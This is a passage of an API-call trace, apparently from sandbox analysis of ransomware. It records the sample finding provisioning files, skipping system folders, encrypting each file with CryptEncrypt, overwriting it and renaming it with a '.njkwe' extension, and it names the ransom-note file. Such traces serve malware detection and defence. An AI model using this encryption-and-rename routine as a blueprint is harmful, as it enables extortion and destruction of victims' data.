Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.718] GetProcessHeap () returned 0xbe0000 [0080.718] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.718] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x368, lpOverlapped=0x0) returned 1 [0080.725] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc98, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.725] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x368, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x368, lpOverlapped=0x0) returned 1 [0080.725] GetProcessHeap () returned 0xbe0000 [0080.725] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.725] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.725] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.725] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.725] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.725] CloseHandle (hObject=0x43c) returned 1 [0080.725] GetProcessHeap () returned 0xbe0000 [0080.725] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.725] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0080.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\471__connections_cellular_o2 - uk (united kingdom)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\471__Connections_Cellular_O2 - UK (United Kingdom)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\471__connections_cellular_o2 - uk (united kingdom)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.726] GetProcessHeap () returned 0xbe0000 [0080.726] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.726] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91108ea4, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91108ea4, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91108ea4, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x359, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml", cAlternateFileName="472__C~1.PRO")) returned 1 [0080.726] lstrcmpiW (lpString1="472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.726] lstrcmpiW (lpString1="472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.726] lstrcmpiW (lpString1="472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.726] lstrcmpiW (lpString1="472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.726] lstrcmpiW (lpString1="472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.726] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml") returned 168 [0080.726] StrStrIW (lpFirst="472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.726] lstrcmpW (lpString1="472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.726] lstrcmpW (lpString1="472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.726] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\472__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.726] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\472__connections_cellular_o2 - uk (united kingdom)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.727] GetTickCount () returned 0x11547f2 [0080.727] GetTickCount () returned 0x11547f2 [0080.727] GetTickCount () returned 0x11547f2 [0080.727] GetTickCount () returned 0x11547f2 [0080.727] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.727] GetProcessHeap () returned 0xbe0000 [0080.727] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.727] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x359, lpOverlapped=0x0) returned 1 [0080.731] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.731] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x359, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x359, lpOverlapped=0x0) returned 1 [0080.731] GetProcessHeap () returned 0xbe0000 [0080.731] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.731] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.731] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.731] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.731] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.731] CloseHandle (hObject=0x43c) returned 1 [0080.731] GetProcessHeap () returned 0xbe0000 [0080.731] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.731] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0080.731] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\472__connections_cellular_o2 - uk (united kingdom)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\472__Connections_Cellular_O2 - UK (United Kingdom)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\472__connections_cellular_o2 - uk (united kingdom)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.732] GetProcessHeap () returned 0xbe0000 [0080.732] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.732] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91108ea4, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91108ea4, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x91108ea4, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x354, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml", cAlternateFileName="473__C~1.PRO")) returned 1 [0080.732] lstrcmpiW (lpString1="473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.732] lstrcmpiW (lpString1="473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.732] lstrcmpiW (lpString1="473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.732] lstrcmpiW (lpString1="473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.732] lstrcmpiW (lpString1="473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.732] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml") returned 168 [0080.732] StrStrIW (lpFirst="473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.732] lstrcmpW (lpString1="473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.732] lstrcmpW (lpString1="473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.732] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\473__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.732] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\473__connections_cellular_o2 - uk (united kingdom)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.740] GetTickCount () returned 0x1154802 [0080.740] GetTickCount () returned 0x1154802 [0080.740] GetTickCount () returned 0x1154802 [0080.740] GetTickCount () returned 0x1154802 [0080.740] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.740] GetProcessHeap () returned 0xbe0000 [0080.740] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.740] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x354, lpOverlapped=0x0) returned 1 [0080.743] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.743] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x354, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x354, lpOverlapped=0x0) returned 1 [0080.747] GetProcessHeap () returned 0xbe0000 [0080.747] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0080.747] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.747] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0080.747] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0080.748] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0080.748] CloseHandle (hObject=0x43c) returned 1 [0080.748] GetProcessHeap () returned 0xbe0000 [0080.748] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0080.748] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0080.748] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\473__connections_cellular_o2 - uk (united kingdom)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\473__Connections_Cellular_O2 - UK (United Kingdom)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\473__connections_cellular_o2 - uk (united kingdom)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0080.748] GetProcessHeap () returned 0xbe0000 [0080.749] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0080.749] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91108ea4, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x91108ea4, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9112f110, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34e, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml", cAlternateFileName="474__C~1.PRO")) returned 1 [0080.749] lstrcmpiW (lpString1="474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0080.749] lstrcmpiW (lpString1="474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0080.749] lstrcmpiW (lpString1="474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0080.749] lstrcmpiW (lpString1="474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0080.749] lstrcmpiW (lpString1="474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0080.749] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml") returned 168 [0080.749] StrStrIW (lpFirst="474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0080.749] lstrcmpW (lpString1="474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0080.749] lstrcmpW (lpString1="474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0080.749] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\474__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0080.749] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\474__connections_cellular_o2 - uk (united kingdom)_i3$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0080.749] GetTickCount () returned 0x1154802 [0080.749] GetTickCount () returned 0x1154802 [0080.749] GetTickCount () returned 0x1154802 [0080.749] GetTickCount () returned 0x1154802 [0080.749] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0080.749] GetProcessHeap () returned 0xbe0000 [0080.749] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0080.750] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x34e, lpOverlapped=0x0) returned 1 [0081.054] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffcb2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.054] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x34e, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x34e, lpOverlapped=0x0) returned 1 [0081.054] GetProcessHeap () returned 0xbe0000 [0081.054] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.054] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.054] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.054] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.054] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.054] CloseHandle (hObject=0x43c) returned 1 [0081.054] GetProcessHeap () returned 0xbe0000 [0081.055] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.055] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 188 [0081.055] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\474__connections_cellular_o2 - uk (united kingdom)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\474__Connections_Cellular_O2 - UK (United Kingdom)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\474__connections_cellular_o2 - uk (united kingdom)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.056] GetProcessHeap () returned 0xbe0000 [0081.056] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.056] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9112f110, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9112f110, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9112f110, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x354, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml", cAlternateFileName="475__C~1.PRO")) returned 1 [0081.056] lstrcmpiW (lpString1="475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.056] lstrcmpiW (lpString1="475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.056] lstrcmpiW (lpString1="475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.056] lstrcmpiW (lpString1="475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.056] lstrcmpiW (lpString1="475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.056] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\475__Connections_Cellular_O2 - UK (United Kingdom)_i4$(__MVID)@WAP.provxml") returned 168 [0081.056] 